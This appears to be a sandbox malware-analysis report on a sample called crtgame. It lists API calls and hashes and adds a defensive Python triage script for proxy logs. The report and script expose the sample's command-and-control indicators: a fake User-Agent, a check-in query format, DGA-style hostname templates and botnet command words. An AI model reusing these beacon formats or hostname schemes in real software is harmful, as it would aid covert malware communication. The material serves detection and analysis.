                                                                                    • String ID: (
                                                                                    • API String ID: 2871813557-3887548279
                                                                                    • Opcode ID: 9321c93d6946193766cc869a403ef6b29bf9c598059eb8e21111d4d635bceff1
                                                                                    • Instruction ID: 73eca0390210d7a40a1dffd36c51e55bbb3bf329b7d36a6fe3b71f36df8b4b42
                                                                                    • Opcode Fuzzy Hash: 9321c93d6946193766cc869a403ef6b29bf9c598059eb8e21111d4d635bceff1
                                                                                    • Instruction Fuzzy Hash: C5516375A00205EFDB14CF94CA84BAEB7B5FF44304F2481AEE905AB3C1D7B49A45CB94
                                                                                    APIs
                                                                                    • GetStringTypeW.KERNEL32(00000001,00408648,00000001,00000000,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 004067ED
                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,00408644,00000001,?,?,00000000,00000000,00000001), ref: 00406807
                                                                                    • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 0040683B
                                                                                    • MultiByteToWideChar.KERNEL32(00405F95,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 00406873
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004068C9
                                                                                    • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004068DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 3852931651-0
                                                                                    • Opcode ID: 343b14822d5ec7d111824b73352daee55c6e4e1e1d6c52bea77643b708a495d7
                                                                                    • Instruction ID: 50980d25d2700a0f5f5aeda790786f3a94e16ebae640f38457f1ad5474eb6a05
                                                                                    • Opcode Fuzzy Hash: 343b14822d5ec7d111824b73352daee55c6e4e1e1d6c52bea77643b708a495d7
                                                                                    • Instruction Fuzzy Hash: 62419172501205EFCF20AF94CD85EAF3B78FB04310F11453AF912B2290C7398920DBA9
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32 ref: 004036C5
                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004036FA
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040375A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                    • API String ID: 1385375860-4131005785
                                                                                    • Opcode ID: 2b88326c2fe55b0a14a7feb83319d9effda22d0a54183ba7eb2025853be321d7
                                                                                    • Instruction ID: a2ac6458048a5ea589aa0576a35918abbfe1c7cf89248b80a846e37b277fff56
                                                                                    • Opcode Fuzzy Hash: 2b88326c2fe55b0a14a7feb83319d9effda22d0a54183ba7eb2025853be321d7
                                                                                    • Instruction Fuzzy Hash: F53104F194528469EB318A705C55BDE3FAC9B0630AF2484FBD185F72C2D63D8F898B19
                                                                                    APIs
                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 00404E2F
                                                                                    • GetFileType.KERNEL32(00000800), ref: 00404ED5
                                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 00404F2E
                                                                                    • GetFileType.KERNEL32(00000000), ref: 00404F3C
                                                                                    • SetHandleCount.KERNEL32 ref: 00404F73
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                                    • String ID:
                                                                                    • API String ID: 1710529072-0
                                                                                    • Opcode ID: 2c403891a32edcd1acd392618127e857cbe5837ab8f556158ace0b12abf30bb6
                                                                                    • Instruction ID: a78e8e59f5f07694c43e079bee3d99c5a60abb541b89316fbbdfd4e78c5fe92d
                                                                                    • Opcode Fuzzy Hash: 2c403891a32edcd1acd392618127e857cbe5837ab8f556158ace0b12abf30bb6
                                                                                    • Instruction Fuzzy Hash: D55123B1504202CBD7209B28CE847673BD0FB91364F19873EE6A6EB3E0D7789845979D
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00402DE9), ref: 004031FF
                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040320F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                    • API String ID: 1646373207-3105848591
                                                                                    • Opcode ID: fd7c0e462cbbc13dc3104afae60c032d0db7a7a26e33d0b776a2fe485baad9f3
                                                                                    • Instruction ID: 0a12f4e0a457fd75e54004e1fe13d9292b3ad5ee8f8a66ed0c634b2074e57af1
                                                                                    • Opcode Fuzzy Hash: fd7c0e462cbbc13dc3104afae60c032d0db7a7a26e33d0b776a2fe485baad9f3
                                                                                    • Instruction Fuzzy Hash: 91C01270380A0166DA202FA20F09B26294C0B94B03F1A04BEAC89F40C1CEBCCA08902D
                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403834), ref: 004040BD
                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403834), ref: 004040E1
                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403834), ref: 004040FB
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403834), ref: 004041BC
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403834), ref: 004041D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 714016831-0
                                                                                    • Opcode ID: 1326177f1af03cc7b67246c1eb97589beecab0fa3316904429e1e159162eb5fe
                                                                                    • Instruction ID: 72305b1c6ee3ebb5b96cda59697c7b30ca10d898fd4ed66b6bda130c081df910
                                                                                    • Opcode Fuzzy Hash: 1326177f1af03cc7b67246c1eb97589beecab0fa3316904429e1e159162eb5fe
                                                                                    • Instruction Fuzzy Hash: 4A3106B0600702ABE3208F24DD48B6276E0EBD5754F10413AEA65BF7D1E778A8809B9C
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(?,00000000), ref: 0040648D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID: $
                                                                                    • API String ID: 1807457897-3032137957
                                                                                    • Opcode ID: c2d0a335d03f329941ba4b81d6dd3e3e8a08df66aa9961035346a9fe4a0d5305
                                                                                    • Instruction ID: 3d0151050a2cad6db625bead7b0d8e4ea389b69a7fce316a905a2e80243c5a15
                                                                                    • Opcode Fuzzy Hash: c2d0a335d03f329941ba4b81d6dd3e3e8a08df66aa9961035346a9fe4a0d5305
                                                                                    • Instruction Fuzzy Hash: 7B418D32014258AEEB218714EDD9BFB3F98EB06700F1505FAD58BF71D3C23949649B6A
                                                                                    APIs
                                                                                    • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F18
                                                                                    • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F4C
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F66
                                                                                    • HeapFree.KERNEL32(00000000,?,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap$FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3499195154-0
                                                                                    • Opcode ID: 8d702973578f7d89d234971eade15b21b0a6fc2314a6c92e3ffe01eebb0314cc
                                                                                    • Instruction ID: 24f0b30d018d5df833e0385571de57ef5827e536e69f65b6ec69a4ed7564f7a0
                                                                                    • Opcode Fuzzy Hash: 8d702973578f7d89d234971eade15b21b0a6fc2314a6c92e3ffe01eebb0314cc
                                                                                    • Instruction Fuzzy Hash: 39111670600245DFC720CF19EE85A227BB5FB887557200A3EE5A2F69F0C7709946CF08

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.5%
                                                                                    Total number of Nodes:711
                                                                                    Total number of Limit Nodes:35
                                                                                    execution_graph: [node and edge listing of the interactive execution graph (711 nodes, 35 limit nodes), rendered as text; each node is a graph ID, a code address in the 0x02C4xxxx-0x02C6xxxx range and, where resolved, the CRT routine or Win32 API called there (e.g. SHGetSpecialFolderPathW, CreateFileA, WSAStartup, HeapAlloc, VirtualAlloc, LoadLibraryExW, GetProcAddress, IsDebuggerPresent, OutputDebugStringW, SetUnhandledExceptionFilter, TerminateProcess, InitializeCriticalSectionAndSpinCount, TlsGetValue, TlsSetValue); the full listing is omitted here]
                                                                                    APIs
                                                                                    • RtlInitializeCriticalSection.NTDLL(02C773D8), ref: 02C45F43
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C45F5A
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F63
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C45F72
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F75
                                                                                      • Part of subcall function 02C4F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C4F235
                                                                                      • Part of subcall function 02C4F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C4F256
                                                                                      • Part of subcall function 02C4F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C4F26A
                                                                                      • Part of subcall function 02C4F1E7: CloseHandle.KERNEL32(00000000), ref: 02C4F273
                                                                                    • GetTickCount.KERNEL32 ref: 02C45FB6
                                                                                    • GetVersionExA.KERNEL32(02C77030), ref: 02C45FE3
                                                                                    • _memset.LIBCMT ref: 02C46000
                                                                                    • _malloc.LIBCMT ref: 02C4600D
                                                                                    • _malloc.LIBCMT ref: 02C4601D
                                                                                    • _malloc.LIBCMT ref: 02C4602B
                                                                                    • _malloc.LIBCMT ref: 02C46036
                                                                                    • _malloc.LIBCMT ref: 02C46041
                                                                                    • _malloc.LIBCMT ref: 02C4604C
                                                                                    • _malloc.LIBCMT ref: 02C46057
                                                                                    • _malloc.LIBCMT ref: 02C46066
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C4607D
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46086
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C46095
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46098
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C460A3
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C460A6
                                                                                    • _memset.LIBCMT ref: 02C460B9
                                                                                    • _memset.LIBCMT ref: 02C460C5
                                                                                    • _memset.LIBCMT ref: 02C460D2
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C460E0
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C460ED
                                                                                    • _malloc.LIBCMT ref: 02C46111
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • _malloc.LIBCMT ref: 02C4611F
                                                                                    • _malloc.LIBCMT ref: 02C46126
                                                                                    • _malloc.LIBCMT ref: 02C4614A
                                                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C4615A
                                                                                    • Sleep.KERNELBASE ref: 02C46168
                                                                                    • _malloc.LIBCMT ref: 02C46174
                                                                                    • _malloc.LIBCMT ref: 02C46181
                                                                                    • _memset.LIBCMT ref: 02C46196
                                                                                    • _memset.LIBCMT ref: 02C461A6
                                                                                    • Sleep.KERNELBASE(00001388), ref: 02C461C2
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C461CD
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C461DE
                                                                                    • _memset.LIBCMT ref: 02C46233
                                                                                    • _memset.LIBCMT ref: 02C46242
                                                                                    • GetTickCount.KERNEL32 ref: 02C462E5
                                                                                    • _memset.LIBCMT ref: 02C4630F
                                                                                    • wsprintfA.USER32 ref: 02C46C3B
                                                                                    • _memset.LIBCMT ref: 02C46C5C
                                                                                    • _memset.LIBCMT ref: 02C46C6C
                                                                                    • _memset.LIBCMT ref: 02C46C9B
                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C46D3D
                                                                                    • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C46D65
                                                                                    • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C46D7D
                                                                                    • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C46D95
                                                                                    • _memset.LIBCMT ref: 02C46DA5
                                                                                    • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C46DBE
                                                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C46DDD
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C46DF7
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C46E02
                                                                                    • _memset.LIBCMT ref: 02C46E4D
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C46E72
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C46E83
                                                                                    • _malloc.LIBCMT ref: 02C46F0A
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C46F1C
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C46F28
                                                                                    • _memset.LIBCMT ref: 02C46F42
                                                                                    • _memset.LIBCMT ref: 02C46F51
                                                                                    • _memset.LIBCMT ref: 02C46F61
                                                                                    • _memset.LIBCMT ref: 02C46F70
                                                                                    • _memset.LIBCMT ref: 02C46F82
                                                                                    • _malloc.LIBCMT ref: 02C46FFC
                                                                                    • _memset.LIBCMT ref: 02C4700D
                                                                                    • _strtok.LIBCMT ref: 02C4702D
                                                                                    • _swscanf.LIBCMT ref: 02C47044
                                                                                    • _strtok.LIBCMT ref: 02C4705B
                                                                                    • Sleep.KERNEL32(000007D0), ref: 02C47162
                                                                                    • _memset.LIBCMT ref: 02C471D6
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C471E3
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C471F5
                                                                                    • _sprintf.LIBCMT ref: 02C4728A
                                                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C4734E
                                                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C47382
                                                                                      • Part of subcall function 02C45D1D: _malloc.LIBCMT ref: 02C45D2B
                                                                                    • _malloc.LIBCMT ref: 02C47583
                                                                                    • _memset.LIBCMT ref: 02C4758F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                                    • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                                    • API String ID: 2018021302-1381308451
                                                                                    • Opcode ID: b391904ee28ecd93b675c32ba0629b9339e00344e0a5aa5718f1a4342054773e
                                                                                    • Instruction ID: ae938776c8b5a5596eafecf4a29edd79c886570833847600ded0764432ed6c77
                                                                                    • Opcode Fuzzy Hash: b391904ee28ecd93b675c32ba0629b9339e00344e0a5aa5718f1a4342054773e
                                                                                    • Instruction Fuzzy Hash: 07D219B36187905ED3159B2C9C81B7FFBECAB89308F58093DF5D5C6142CA28C606DB92
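The listing above is the sample's main loop, and its strings already give the traffic shape a responder needs: the WinINet session is opened with the User-Agent "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)" (there is no Windows NT 9.0, which makes that string a clean pivot), the three InternetSetOptionA calls set option 2, 5 and 6 (INTERNET_OPTION_CONNECT_TIMEOUT, INTERNET_OPTION_SEND_TIMEOUT, INTERNET_OPTION_RECEIVE_TIMEOUT) to 0x1388 = 5000 ms, InternetOpenUrlA is called with flags 0x04000200 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI, and the reply is read in 0x1000-byte chunks. The check-in body is built from "client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d", the path string is "/click/?counter=", the "Host: %s" string suggests the request is sent with an explicit Host header, and the 26 templates of the form "a%c%c%c%c%c%c.ru" ... "z%c%c%c%c%c%c.ua" fix a letter-to-TLD table for generated hostnames (note that both i and j map to .info, so it is not a plain five-way cycle). The replies are parsed with _strtok/_swscanf against the command words connect, disconnect, idle, block, updips, updurls, urls, auth_ip and auth_swith.

The following triage helper is an added example written for this page; it is not code from the Joe Sandbox report or from the sample. It only encodes the strings shown in the listing. Two things are assumptions because the listing does not show them: that the six %c characters are lowercase letters or digits, and how the "/click/?counter=" path and the check-in query are combined into one URL (the constructed sample lines below keep them separate).

```python
"""Proxy-log triage built from the strings in the listing above.

Added example, not part of the report and not the sample's own code.  The
constants are the strings shown under "String ID"; anything else is marked
as an assumption.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Exact strings from the listing.
USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
CHECKIN_FORMAT = ("client_id=%.8x&connected=%d&server_port=%d&debug=%d"
                  "&os=%d.%d.%04d&dgt=%d&dti=%d")

# Letter -> TLD table copied from the "<letter>%c%c%c%c%c%c.<tld>" strings.
# Not a clean cycle: i and j both end in .info.
HOST_TEMPLATES = {
    "a": "ru", "b": "com", "c": "net", "d": "info", "e": "ua",
    "f": "ru", "g": "com", "h": "net", "i": "info", "j": "info",
    "k": "ua", "l": "ru", "m": "com", "n": "net", "o": "info",
    "p": "ua", "q": "ru", "r": "com", "s": "net", "t": "info",
    "u": "ua", "v": "ru", "w": "com", "x": "net", "y": "info", "z": "ua",
}
# ASSUMPTION: the six %c characters are [a-z0-9]; the report shows only the template.
_SIX = "[a-z0-9]{6}"

def matches_host_template(host: str) -> bool:
    """True if host is <letter><6 chars>.<tld> and the tld is the one the table gives that letter."""
    m = re.fullmatch(r"([a-z])" + _SIX + r"\.([a-z]+)", host.lower())
    return bool(m) and HOST_TEMPLATES.get(m.group(1)) == m.group(2)

def _expected_fields() -> dict:
    """Field name -> printf conversion, derived from CHECKIN_FORMAT."""
    return dict(part.split("=", 1) for part in CHECKIN_FORMAT.split("&"))

def parse_checkin(query: str):
    """Parse a check-in query string; None unless names, order and conversions all match."""
    expected = _expected_fields()
    got = dict(parse_qsl(query, keep_blank_values=True))
    if list(got) != list(expected):
        return None
    out = {}
    for name, conv in expected.items():
        val = got[name]
        if conv == "%.8x":                       # client_id: exactly 8 hex digits
            if not re.fullmatch(r"[0-9a-f]{8}", val):
                return None
            out[name] = int(val, 16)
        elif conv == "%d":
            if not re.fullmatch(r"-?\d+", val):
                return None
            out[name] = int(val)
        elif conv == "%d.%d.%04d":               # os: major.minor.build, build zero-padded to 4
            m = re.fullmatch(r"(\d+)\.(\d+)\.(\d{4,})", val)
            if not m:
                return None
            out[name] = tuple(int(x) for x in m.groups())
        else:
            return None
    return out

def classify_request(host: str, path_and_query: str, user_agent: str) -> list:
    """Reasons a request resembles this sample's traffic; [] if none."""
    reasons = []
    if user_agent == USER_AGENT:
        reasons.append("user-agent")            # "Windows NT 9.0" never shipped
    if matches_host_template(host):
        reasons.append("dga-template")          # weak on its own: any 7-char label with the right TLD hits
    parts = urlsplit(path_and_query)
    if parts.path == "/click/" and parts.query.startswith("counter="):
        reasons.append("click-counter-path")
    if parse_checkin(parts.query) is not None:
        reasons.append("checkin-format")
    return reasons

# Constructed sample proxy records (host, path+query, user-agent); not from the report.
SAMPLE_LINES = [
    ("w3k9q2x.com",
     "/?client_id=0000abcd&connected=1&server_port=1080&debug=0&os=6.1.7601&dgt=0&dti=0",
     USER_AGENT),
    ("example.com", "/index.html", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    ("a1b2c3d.com", "/click/?counter=1", "curl/8.0"),   # 'a' must end in .ru, so no template hit
]

def triage(lines=SAMPLE_LINES) -> list:
    return [(host, classify_request(host, pq, ua)) for host, pq, ua in lines]

if __name__ == "__main__":
    for host, reasons in triage():
        print(host, reasons or "clean")
```

The hostname-template check alone fires on any seven-character label under one of the five TLDs (example.com matches the regex and is rejected only by the letter-to-TLD table), so treat it as a weak signal to combine with the User-Agent or the check-in shape rather than a stand-alone rule.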
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc$AddressHandleModuleProc$CountCriticalHeapInitializeProcessSectionTickVersion_memset
                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
                                                                                    • API String ID: 2339383661-2290804818
                                                                                    • Opcode ID: 4902d3046e3600d51c830d48658b7e10fddc97c2c3d723c13141819e2b47d8b1
                                                                                    • Instruction ID: 78387564b09908bb51d7c479f8ae8f5555bc3afe1c228a90e4d9056a1f0698f8
                                                                                    • Opcode Fuzzy Hash: 4902d3046e3600d51c830d48658b7e10fddc97c2c3d723c13141819e2b47d8b1
                                                                                    • Instruction Fuzzy Hash: 8FD138B2D44350AFD720AF34AC48B6FBBE8EF89714F14092DFA8497241DB748945CB96
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C45F5A
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F63
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C45F72
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F75
                                                                                    • GetTickCount.KERNEL32 ref: 02C45FB6
                                                                                    • GetVersionExA.KERNEL32(02C77030), ref: 02C45FE3
                                                                                    • _memset.LIBCMT ref: 02C46000
                                                                                    • _malloc.LIBCMT ref: 02C4600D
                                                                                    • _malloc.LIBCMT ref: 02C4601D
                                                                                    • _malloc.LIBCMT ref: 02C4602B
                                                                                    • _malloc.LIBCMT ref: 02C46036
                                                                                    • _malloc.LIBCMT ref: 02C46041
                                                                                    • _malloc.LIBCMT ref: 02C4604C
                                                                                    • _malloc.LIBCMT ref: 02C46057
                                                                                    • _malloc.LIBCMT ref: 02C46066
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C4607D
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46086
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C46095
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46098
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C460A3
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C460A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountTickVersion_memset
                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
                                                                                    • API String ID: 822168373-2290804818
                                                                                    • Opcode ID: 87aab8db4b7662471619f8fde7bbb6fdbd9635f982fd64d0e523b544d4d5205e
                                                                                    • Instruction ID: f7f6d9c3390279ad6138bb24df0e354b349391b69f3acdb56ef469b85d0238f4
                                                                                    • Opcode Fuzzy Hash: 87aab8db4b7662471619f8fde7bbb6fdbd9635f982fd64d0e523b544d4d5205e
                                                                                    • Instruction Fuzzy Hash: 0FD12772E48350AFD721AF349C44B6BBBE8EF89314F14092DFA84D7281DB748945CB96

                                                                                    Control-flow Graph

